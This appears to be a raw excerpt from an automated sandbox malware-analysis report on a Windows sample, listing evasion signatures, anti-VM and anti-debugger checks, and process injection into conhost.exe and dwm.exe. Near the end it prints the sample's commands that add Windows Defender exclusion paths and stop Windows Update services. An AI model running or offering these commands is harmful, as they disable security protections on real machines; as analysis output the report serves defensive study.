                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040D7703_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040D7704_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040D77018_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_18-4456
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-4456
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_18-4456
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-4456
                                Source: C:\Windows\System32\dwm.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeMemory allocated: C20000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeMemory allocated: 1B9B0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 900000Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\sysppvrdnvs.exeWindow / User API: threadDelayed 4139Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeWindow / User API: threadDelayed 1101Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeWindow / User API: threadDelayed 562Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7143Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2479Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6441
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3344
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7188
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2511
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7329
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9505
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvaded block: after key decisiongraph_3-4472
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvaded block: after key decisiongraph_3-4458
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvaded block: after key decisiongraph_3-4540
                                Source: C:\Windows\sysppvrdnvs.exeEvaded block: after key decisiongraph_18-4456
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_3-4500
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-5870
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_3-5404
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-4481
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrAPI coverage: 3.8 %
                                Source: C:\Windows\sysppvrdnvs.exeAPI coverage: 0.9 %
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040D77018_2_0040D770
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040D7703_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exe TID: 2024Thread sleep time: -40000s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 5772Thread sleep count: 4139 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 5772Thread sleep time: -8278000s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 3640Thread sleep count: 342 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 2024Thread sleep count: 1101 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4180Thread sleep time: -73640s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4180Thread sleep time: -900000s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 5772Thread sleep count: 562 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 5772Thread sleep time: -1124000s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4904Thread sleep count: 7143 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5860Thread sleep count: 2479 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exe TID: 936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6928Thread sleep count: 6441 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6916Thread sleep count: 3344 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -5534023222112862s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5100Thread sleep count: 7188 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5100Thread sleep count: 2511 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 7329 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep count: 256 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1948Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580Thread sleep count: 9505 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,18_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,18_2_004067A0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 40000Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 73640Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 900000Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                                Source: Us051y7j25.exe, 00000000.00000002.2346965220.00000000008EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                                Source: sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                                Source: Us051y7j25.exe, 00000000.00000002.2346965220.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000003.2341630604.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000002.2346965220.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000003.2341074992.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000003.2341630604.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000002.2346965220.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                                Source: 1881231804.exe, 00000013.00000002.2606598156.0000000000D29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrAPI call chain: ExitProcess graph end nodegraph_3-4469
                                Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_4-4501
                                Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_18-4500
                                Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_18-4469
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_00141DF8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00141DF8
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_001410B0 Sleep,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_001410B0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040A890 GetProcessHeaps,3_2_0040A890
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_00141DF8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00141DF8
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeCode function: 26_2_00871958 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,26_2_00871958
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeCode function: 27_2_00601C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,27_2_00601C08
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeCode function: 29_2_00C918A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,29_2_00C918A8
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89A1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,37_2_00007FF7B89A1180
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeNtQuerySystemInformation: Direct from: 0x7FF7AD1B5B0E
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeNtQuerySystemInformation: Direct from: 0x7FF6904F5B0E
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\dwm.exe protection: readonly
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 7112
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 6072
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\conhost.exe base: F0AF4F2010
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\dwm.exe base: 84EBAA4010
                                Source: C:\Users\user\Desktop\Us051y7j25.exeProcess created: C:\Users\user\AppData\Local\Temp\21324.scr "C:\Users\user\AppData\Local\Temp\21324.scr" /SJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
